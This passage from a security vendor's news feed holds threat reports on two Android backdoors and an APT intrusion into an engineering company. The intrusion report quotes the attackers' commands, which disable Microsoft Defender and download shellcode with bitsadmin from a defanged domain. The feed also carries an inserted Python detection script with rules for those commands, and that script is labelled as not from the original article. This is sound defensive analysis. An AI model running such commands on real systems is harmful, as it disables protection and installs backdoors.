The malicious program can receive the following commands:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;create a blacklist of chats that will not be displayed in the Telegram X window;&lt;/li&gt;&lt;li&gt;conceal specified devices from the user in the list of authorized devices for their account;&lt;/li&gt;&lt;li&gt;block notifications from blacklisted chats for a specified time;&lt;/li&gt;&lt;li&gt;display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);&lt;/li&gt;&lt;li&gt;send the C2 server information about all of the installed apps;&lt;/li&gt;&lt;li&gt;terminate the user’s current authorized Telegram login session on the infected device;&lt;/li&gt;&lt;li&gt;display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);&lt;/li&gt;&lt;li&gt;remove the Telegram Premium icon in the app’s interface for the current user;&lt;/li&gt;&lt;li&gt;upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;&lt;/li&gt;&lt;li&gt;subscribe the user to a specified Telegram channel;&lt;/li&gt;&lt;li&gt;leave a specified Telegram channel;&lt;/li&gt;&lt;li&gt;join a specified Telegram channel on behalf of the user, using the provided URL;&lt;/li&gt;&lt;li&gt;obtain the list of devices authorized in Telegram;&lt;/li&gt;&lt;li&gt;request the user’s authentication token and upload it to the C2 server.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. 
The trojan will intercept this information from the clipboard and send it to the malicious actors.&lt;/p&gt;&lt;p&gt;Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, so this malware does not pose a threat to our users.&lt;/p&gt;&lt;p&gt;More details about &lt;a href="https://vms.drweb.com/virus/?i=30931101&amp;amp;lng=en"&gt;&lt;strong&gt;Android.Backdoor.Baohuo.1.origin&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Backdoor.Baohuo.1.origin/README.adoc"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15047&amp;lng=en</guid><title>Android backdoor spies on employees of Russian businesses</title><link>https://news.drweb.com/show/?i=15047&amp;lng=en&amp;c=23</link><pubDate>Wed, 20 Aug 2025 10:47:54 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;August 20, 2025&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Doctor Web is informing users about Android.Backdoor.916.origin, a multi-functional backdoor that spreads in the wild and targets Russian businesses. The malware is capable of executing multiple commands received from attackers and has rich functionality for espionage and data theft. Among other capabilities, it can listen to conversations, broadcast from a device’s camera, steal content from messengers and browsers, and use its keylogger functionality to hijack entered text, including passwords.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The first &lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; versions emerged in January 2025. Since discovering the backdoor, Doctor Web’s anti-virus laboratory has tracked the malware’s evolution and detected a number of versions of it (information about them is provided in the corresponding indicators of compromise). Our experts believe that &lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; is likely designed more for targeted attacks than for mass distribution among Android device users. Its main target is Russian business representatives.&lt;/p&gt;

&lt;p&gt;Threat actors use direct messages in messengers to distribute the backdoor’s APK file under the guise of an anti-virus called “GuardCB”. The app’s icon resembles the emblem of the Russian Federation’s Central Bank; the emblem is set against the background of a shield. At the same time, the app’s interface provides only one language—Russian. Thus, the malware is entirely focused on Russian users. This is confirmed by other detected modifications with names like “SECURITY_FSB”, “ФСБ” (FSB), and others, which cybercriminals are trying to pass off as security-related programs that are supposedly related to Russian law enforcement agencies.&lt;/p&gt;

&lt;div class="img img-two-v"&gt;
   &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_01.png" data-fancybox&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_01.png" alt="#drweb"&gt;
  &lt;/a&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_02.png" data-fancybox&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_02.png" alt="#drweb"&gt;
  &lt;/a&gt;      
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Icons of the malware mislead potential victims&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The app does not in fact have any anti-virus features. When it runs, &lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; acts like it is performing an anti-virus scan on a device, while the probability of “detecting” threats is programmed into it. The more time that has passed since the previous “scan”, the higher the chance is, but no more than 30%. The number of allegedly found threats is determined randomly and ranges from 1 to 3.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_03.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_03.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_04.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_04.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;When it first launches, &lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; requests access to many system permissions:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Geolocation;&lt;/li&gt;
    &lt;li&gt;Audio recording;&lt;/li&gt;
    &lt;li&gt;Access to SMS, contacts, call history, media files, permission to make calls;&lt;/li&gt;
    &lt;li&gt;Camera (to take pictures and record videos);&lt;/li&gt;
    &lt;li&gt;Permission to run in the background;&lt;/li&gt;
    &lt;li&gt;Device administrator rights;&lt;/li&gt;
    &lt;li&gt;Accessibility Service.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="margTM margBM flex center"&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_05_video.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_05_video.1.png" alt="#drweb"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_06_audio.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_06_audio.1.png" alt="#drweb"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_07_admin.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_07_admin.1.png" alt="#drweb"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_08_accessibility.png" class="preview"&gt;
         &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/android_backdoor/Android.Backdoor.916.origin_08_accessibility.1.png" alt="#drweb"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter" style="text-align: center;"&gt;&lt;em&gt;Examples of the requested permissions&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The malware then launches several of its own services and checks their activity every minute, restarting them if needed. The backdoor uses these services to connect to the C2 server and receive a large number of commands. Among them are:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;upload incoming and outgoing SMS to the C2 server;&lt;/li&gt;
    &lt;li&gt;upload the contacts list to the C2 server;&lt;/li&gt;
    &lt;li&gt;upload call history to the C2 server;&lt;/li&gt;
    &lt;li&gt;upload geolocation data to the C2 server;&lt;/li&gt;
    &lt;li&gt;start or stop audio streaming through the device’s microphone;&lt;/li&gt;
    &lt;li&gt;start or stop video streaming from the device’s camera;&lt;/li&gt;
    &lt;li&gt;start or stop streaming the device’s screen;&lt;/li&gt;
    &lt;li&gt;upload all images stored on a memory card to the C2 server;&lt;/li&gt;
    &lt;li&gt;upload images from a memory card to the C2 server according to a given range of names;&lt;/li&gt;
    &lt;li&gt;upload a specified image from a memory card to the C2 server;&lt;/li&gt;
    &lt;li&gt;enable or disable the backdoor’s self-protection;&lt;/li&gt;
    &lt;li&gt;execute a received shell command;&lt;/li&gt;
    &lt;li&gt;upload information about the device’s network and interfaces to the C2 server.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The backdoor streams the different types of data it collects to separate C2 server ports.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; uses Accessibility Service to execute keylogger functionality and intercept content from messengers and browsers. These apps are monitored by the trojan:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Telegram&lt;/li&gt;
    &lt;li&gt;Google Chrome&lt;/li&gt;
    &lt;li&gt;Gmail&lt;/li&gt;
    &lt;li&gt;Яндекс Старт (Yandex Start)&lt;/li&gt;
    &lt;li&gt;Яндекс Браузер (Yandex Browser)&lt;/li&gt;
    &lt;li&gt;WhatsApp&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The backdoor also uses Accessibility Service to protect itself from being deleted if it receives the corresponding command from the threat actors.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; has functionality that allows it to operate with a large number of C2 servers whose information is stored in its configuration. Moreover, it can switch between hosting providers, the number of which can be as high as 15, but this option is not being used at the moment. Doctor Web’s anti-virus laboratory has informed domain registrars about the violations it has uncovered.&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space for mobile devices reliably detects and removes all known &lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; modifications, keeping our users well protected from this threat.&lt;/p&gt;

&lt;p&gt;More about &lt;a href="https://vms.drweb.com/virus/?i=30452347&amp;lng=en" target="_blank"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Backdoor.916.origin/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15046&amp;lng=en</guid><title>Take 2: Scaly Wolf persistently targets Russian engineering company’s secrets</title><link>https://news.drweb.com/show/?i=15046&amp;lng=en&amp;c=23</link><pubDate>Tue, 19 Aug 2025 01:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/Trojan.Updatar-en.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;August 19, 2025&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;In 2023, Doctor Web’s experts started an investigation into a targeted attack on a Russian engineering company, the results of which we &lt;a href="https://news.drweb.com/show/?i=14823&amp;lng=en" target="_blank"&gt;reported&lt;/a&gt; in a corresponding study. Apparently, cybercriminals are very interested in the corporate secrets of this enterprise, so two years later they decided to attack it again. The threat actors returned with new malware and a persistent desire to penetrate the company’s IT infrastructure—they used several attack vectors in an attempt to infect the target computers.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h3&gt;Introduction&lt;/h3&gt;

&lt;p&gt;At the end of June 2025, representatives of a Russian engineering enterprise contacted Doctor Web with a request to find out whether the periodic anti-virus detections on one of its computers were a sign of infection or the result of some malfunction. The investigation showed that the anti-virus’s response was normal and that the company had been subjected to a targeted attack.&lt;/p&gt;

&lt;p&gt;The attack originated from a computer that did not have the Dr.Web anti-virus installed on it. This lack of protection led to the network compromise and the infection of several more devices. Our specialists analyzed the affected workstations and reconstructed the chain of events. In this study, we will discuss the infection vector and the methods that the threat actors used in this attack.&lt;/p&gt;

&lt;h3&gt;General information about the attack and the tools involved&lt;/h3&gt;

&lt;p&gt;In early May 2025, the affected company began receiving a spate of emails that appeared to be finance-related. The messages contained a phishing PDF document and a password-protected ZIP archive.&lt;/p&gt;

&lt;figure class="img" style="margin-top: 20px;"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/email_2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/email_2.2.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;figcaption&gt;&lt;em&gt;The PDF decoy and the ZIP archive attached to one of the emails&lt;/em&gt;&lt;/figcaption&gt;
&lt;/figure&gt;

&lt;p&gt;These letters did not have any accompanying text.&lt;/p&gt;

&lt;figure class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/email_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/email_1.2.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;figcaption&gt;&lt;em&gt;An example of one such phishing email&lt;/em&gt;&lt;/figcaption&gt;
&lt;/figure&gt;

&lt;p&gt;The PDF decoys indicated that the received “financial document” was allegedly in the attached archive and, to unpack it, the password provided in the document’s text must be used. At the same time, the design of the phishing PDF files could vary. Some were minimalistic:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/pdf_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/pdf_1.2.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Others were as close to official as possible:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/pdf_2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/pdf_2.2.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The file in the archive was actually an executable, but the malicious actors camouflaged it as a PDF document. To do so, they provided it with the “double” extension (&lt;span class="string"&gt;Акт Сверки.pdf.exe&lt;/span&gt;). Since Windows hides file extensions by default, potential victims do not see the actual extension and mistakenly perceive the file as harmless.&lt;/p&gt;

&lt;p&gt;Doctor Web’s anti-virus laboratory received the first sample of this malicious email on May 6, 2025, after which a virus record for detecting &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; was added to our database. This malicious app is the initial stage of infection by the Updatar modular backdoor; it is designed to download other components in the chain to the target system. The backdoor is used to gather confidential data from the infected computers.&lt;/p&gt;

&lt;p&gt;It is worth noting that &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; is not new malware. The first sample of it came to our experts’ attention a year ago. However, we were unable to obtain the other steps in the chain that it downloads because they are not downloaded from the C2 server automatically but upon the direct command of the server’s operators. Thus, our investigation of an active attack involving this downloader allowed us to track other pieces of the backdoor that had been missing.&lt;/p&gt;

&lt;p&gt;Our study of the new &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; version showed that since the trojan was first discovered, its functionality had not been significantly altered; however, it had acquired a unique obfuscation that makes it more difficult to analyze. Doctor Web’s malware analysts dubbed this technique RockYou Obfuscation. Its essence lies in the fact that the trojan body constantly initializes strings taken from the RockYou.txt dictionary and performs various operations on them that do not affect the program’s main functionality. At the same time, the strings that are directly related to the app’s work are encoded with the XOR operation and a small offset. The key for this offset and the XOR operation is randomized for each &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; sample.&lt;/p&gt;

&lt;blockquote&gt;
    &lt;p&gt;RockYou.txt is a list of over 30 million commonly used passwords, compiled after a major data breach. It is used not only by security specialists for testing the reliability of computer system protection but also by malicious actors—to hack accounts.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;An example of the obfuscation used in the trojan and the corresponding fragment of the RockYou dictionary:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/rockyou_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/rockyou_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/rockyou_2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/rockyou_2.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The chronology of the attack is shown in the following diagram:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/attack_scheme_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/attack_scheme_en.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;The attack on the first computer&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;During the targeted attack in question, the enterprise’s first computer was infected on May 12, 2025—almost a week after the identified &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; modification was added to our virus database. The infection occurred for the simple reason that the target machine lacked Dr.Web anti-virus protection. As a result, having arrived in one of the malicious emails, the trojan launched without any problems when the user opened the “document”. An hour after infection, the trojan downloaded and installed other backdoor components into the system: &lt;b&gt;Trojan.Updatar.2&lt;/b&gt; and &lt;b&gt;Trojan.Updatar.3&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;On May 14, using &lt;b&gt;Trojan.Updatar.3&lt;/b&gt;, the attackers installed a BITS service task on the computer to download &lt;span class="string"&gt;shell.exe&lt;/span&gt;—a program containing shellcode that downloads the main body of the Meterpreter tool, a backdoor utility from the Metasploit framework for testing computer system security.&lt;/p&gt;

&lt;p&gt;Next, one of the &lt;b&gt;Trojan.Updatar.3&lt;/b&gt; modules (&lt;span class="string"&gt;FileManager.exe&lt;/span&gt;) was installed on the system. It is responsible for uploading and downloading files to the computer. Malicious actors used it to steal files from the infected system.&lt;/p&gt;

&lt;p&gt;After that, the attackers used the &lt;b&gt;Tool.HandleKatz&lt;/b&gt; utility, which is designed to dump the memory of the LSASS system process, to obtain Windows user account credentials. They then installed the RDP Wrapper tool (&lt;b&gt;Program.Rdpwrap.7&lt;/b&gt;) to log in to the system more conveniently via the Remote Desktop Protocol (RDP). In addition, the traffic-tunneling utilities &lt;b&gt;Tool.Chisel&lt;/b&gt; and &lt;b&gt;Tool.Frp&lt;/b&gt; were installed on the victim’s computer.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;The attack on the second computer&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Compromise of the second computer began on May 14, 2025. The attackers reached it over the company’s network using account credentials stolen from the memory of the first infected device, and remotely executed commands on it to determine whether the second computer was worth further infiltration.&lt;/p&gt;

&lt;p&gt;After more than a week, on May 23, the malicious actors installed a BITS service task on this computer to download &lt;b&gt;Trojan.Updatar.1&lt;/b&gt;. However, since Dr.Web anti-virus was present in the system, it blocked the trojan’s launch.&lt;/p&gt;

&lt;p&gt;On May 29, they used the company’s network again to remotely access the device and manually installed the &lt;b&gt;Trojan.Updatar.2&lt;/b&gt; and &lt;b&gt;Trojan.Updatar.3&lt;/b&gt; modules on it, thus gaining a foothold in the system.&lt;/p&gt;

&lt;p&gt;On June 3, 2025, using another BITS service task, they installed the Meterpreter backdoor.&lt;/p&gt;

&lt;p&gt;&lt;b&gt;The attack on the third computer&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;The intruders gained entry into the third system after obtaining user credentials for the Remote Desktop service (RDP). Starting on June 23, 2025, they connected to the computer using the compromised RDP account. Next, to gain a foothold in the system and obtain a remote shell, they launched a standard tool from the Metasploit framework. Through this tool, an attempt was made to execute a payload in the form of a PowerShell script. However, Dr.Web anti-virus, which was installed on this machine, blocked this action after detecting the execution attempt as &lt;b&gt;DPC:BAT.Starter.613&lt;/b&gt;.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/august/updatar/scr_list.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/august/updatar/scr_list.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;This malicious script was supposed to unpack the base64-encoded data containing the second PowerShell script and then run it. The second script contained the base64-encoded shellcode that was to be executed in the PowerShell address space.&lt;/p&gt;

&lt;p&gt;The execution of this script chain would have launched the first stage designed to download the Meterpreter backdoor into the system from the address &lt;span class="string"&gt;77[.]105[.]161[.]30&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;After the anti-virus blocked their attempts to penetrate the system by executing scripts, the malicious actors stopped using standard tools from the Metasploit pack and switched to another tactic: using the RemCom tool. Dr.Web anti-virus detects this program as &lt;b&gt;Program.RemoteAdmin.877&lt;/b&gt;, but in this case it was not blocked, since it is a standard remote administration tool and the default anti-virus settings allow such tools to run.&lt;/p&gt;

&lt;p&gt;Using this utility, the attackers executed the following commands:&lt;/p&gt;

&lt;div class="grid"&gt;
    &lt;pre&gt;&lt;code&gt;
    ipconfig
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    powershell  -Command "Add-MpPreference -ExclusionPath 'C:\'"
    powershell  -Command "Get-MpPreference | Select -ExpandProperty ExclusionPath"
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    tasklist
    reg  add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    chcp
    wmic  service where "name='DrWebAVService'" get PathName
    reg  query "HKLM\SOFTWARE\DrWeb" /v Version
    wmic  product where "name like 'DrWeb%'" get Name, Version
    sc  qc DrWebAVService
    reg  query "HKLM\SOFTWARE\WOW6432Node\DrWeb" /v Version
    tasklist
    findstr  /i drweb
    findstr  /i dr
    findstr  /i drw
    findstr  /i drs
    findstr  /i dws
    wmic  product where "name like 'Dr.Web%'" get Name, Version
    reg  query "HKLM\SOFTWARE\WOW6432Node\Dws" /v Version
    netstat  -a -o -n
    powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""
    
    
    powershell  -Command "Get-MpComputerStatus"
    powershell  -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"
    tasklist
    findstr  /i drweb
    sc  query
    findstr  /i drweb
    cmd: installer.exe
    &lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;They tried to identify the anti-virus software installed on the computer and to establish several footholds in the system:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;span class="string"&gt;shellcode.exe&lt;/span&gt; — one of the Meterpreter variants (&lt;b&gt;BackDoor.Shell.244&lt;/b&gt;), in which shellcode downloads the main Meterpreter body;&lt;/li&gt;
    &lt;li&gt;&lt;span class="string"&gt;installer.exe&lt;/span&gt; — &lt;b&gt;Trojan.Updatar.1&lt;/b&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Dr.Web anti-virus also detected and blocked all these attempts.&lt;/p&gt;
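&lt;p&gt;The command sequence above combines Microsoft Defender tampering (Set-MpPreference, Add-MpPreference with a drive-root exclusion, the DisableAntiSpyware registry value), anti-virus discovery and a BITS download. As an added example, not code from the original article or from Doctor Web, the following Python script shows how a defender can flag exactly these patterns in process command-line telemetry. The sample command lines are constructed here, modelled on the sequence quoted above; the rule names and the triage logic are this example’s own assumptions.&lt;/p&gt;

```python
import re

# Constructed sample of process command lines, modelled on the command sequence
# quoted in the article. This is not a real log export.
SAMPLE_COMMANDS = [
    'ipconfig',
    'powershell  -Command "Set-MpPreference -MAPSReporting 0"',
    'powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    "powershell  -Command \"Add-MpPreference -ExclusionPath 'C:\\'\"",
    'tasklist',
    'reg  add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    'wmic  product where "name like \'DrWeb%\'" get Name, Version',
    'powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\\Pictures\\zabix.exe""',
    'powershell  -Command "Get-MpComputerStatus"',
    'netstat  -a -o -n',
]

# Detection rules (rule names are this example's own). Each is a compiled regex
# searched, case-insensitively, against one process command line.
RULES = [
    ("defender_realtime_off",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("defender_maps_off",
     re.compile(r"Set-MpPreference\s+-MAPSReporting\s+0", re.I)),
    # An exclusion for an entire drive root effectively switches scanning off.
    ("defender_root_exclusion",
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'?[A-Za-z]:\\'?", re.I)),
    ("defender_policy_disable",
     re.compile(r"reg\s+add\s+\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\".*DisableAntiSpyware.*/d\s+1", re.I)),
    # BITS used as a downloader, the technique the article maps to BITS Jobs (T1197).
    ("bits_download",
     re.compile(r"bitsadmin\s+/transfer", re.I)),
    # Enumeration of installed anti-virus products before further action.
    ("av_discovery",
     re.compile(r"DrWeb|Dr\.Web|AntiVirusProduct|Get-MpComputerStatus", re.I)),
]


def scan_command_lines(lines):
    """Return (rule_name, command) pairs for every rule each command line matches."""
    hits = []
    for cmd in lines:
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, cmd))
    return hits


def triage(lines):
    """Count hits per rule and raise an escalation flag when anti-virus tampering
    and a BITS download occur in the same batch, the combination seen above."""
    counts = {}
    for name, _cmd in scan_command_lines(lines):
        counts[name] = counts.get(name, 0) + 1
    tampering = [name for name in counts if name.startswith("defender_")]
    escalate = bool(tampering) and "bits_download" in counts
    return {"counts": counts, "escalate": escalate}


if __name__ == "__main__":
    for name, cmd in scan_command_lines(SAMPLE_COMMANDS):
        print(f"[{name}] {cmd}")
    print(triage(SAMPLE_COMMANDS))
```

&lt;p&gt;Each rule on its own is noisy (administrators do run Get-MpComputerStatus), which is why the triage function only escalates when tampering and a download coincide in one batch; in a real deployment the batch would be the commands of one parent process or one remote-administration session, and a tool the anti-virus allows by default, such as the remote administration utility used here, is exactly where such command-line monitoring matters.&lt;/p&gt;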

&lt;h3&gt;Peculiarities of the malware and the attackers’ infrastructure&lt;/h3&gt;

&lt;ol&gt;
    &lt;li&gt;Multiple C2 servers were used to control the malicious programs utilized in this targeted attack. However, the domain &lt;span class="string"&gt;roscosmosmeet[.]online&lt;/span&gt; was the main source for malware downloads.&lt;/li&gt;
    &lt;li&gt;All variations of the Meterpreter backdoor tool were linked to the IP 77[.]105[.]161[.]30 and accessed different ports.&lt;/li&gt;
    &lt;li&gt;All &lt;b&gt;Trojan.Updatar.3&lt;/b&gt; module modifications used the domain &lt;span class="string"&gt;updating-services[.]com&lt;/span&gt; for communication.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The &lt;b&gt;Trojan.Updatar.1&lt;/b&gt; and &lt;b&gt;Trojan.Updatar.2&lt;/b&gt; modules, depending on their version, used the domains &lt;span class="string"&gt;adobe-updater[.]net&lt;/span&gt; and &lt;span class="string"&gt;updatingservices[.]net&lt;/span&gt;.&lt;/p&gt;

&lt;h3&gt;Who is behind the attack&lt;/h3&gt;

&lt;p&gt;Thanks to the artifacts found in various malware samples, we can confidently identify the APT group responsible for the attack in question. These artifacts were found:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;in the &lt;b&gt;Trojan.Updatar.3&lt;/b&gt; module modifications;&lt;/li&gt;
    &lt;li&gt;in fake apps discovered during the analysis of the threat actors’ infrastructure but not used in the current campaign.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;In addition, they were detected in one of the malicious programs used in &lt;a href="https://news.drweb.com/show/?i=14823&amp;lng=en" target="_blank"&gt;another targeted attack&lt;/a&gt; on the same enterprise.&lt;/p&gt;

&lt;p&gt;All these artifacts indicate that these malicious tools were created by the same developer, one directly associated with the Scaly Wolf group.&lt;/p&gt;

&lt;p&gt;Just like two years ago, the Scaly Wolf group used its self-written modular backdoor to gain a foothold in the system and conduct reconnaissance in it. Unlike in the previous attack, in the current campaign the malicious actors did not use a MaaS trojan (Malware-as-a-Service) to gain initial access to the target computers.&lt;/p&gt;

&lt;p&gt;The threat actors also started using standard tools for post-exploitation and for gaining a foothold in the system:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;various open-source tools for tunneling traffic;&lt;/li&gt;
    &lt;li&gt;the Metasploit framework;&lt;/li&gt;
    &lt;li&gt;different programs for remote PC access.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Another peculiarity is that this group sends emails containing the malware from addresses registered with the Mail.ru service.&lt;/p&gt;

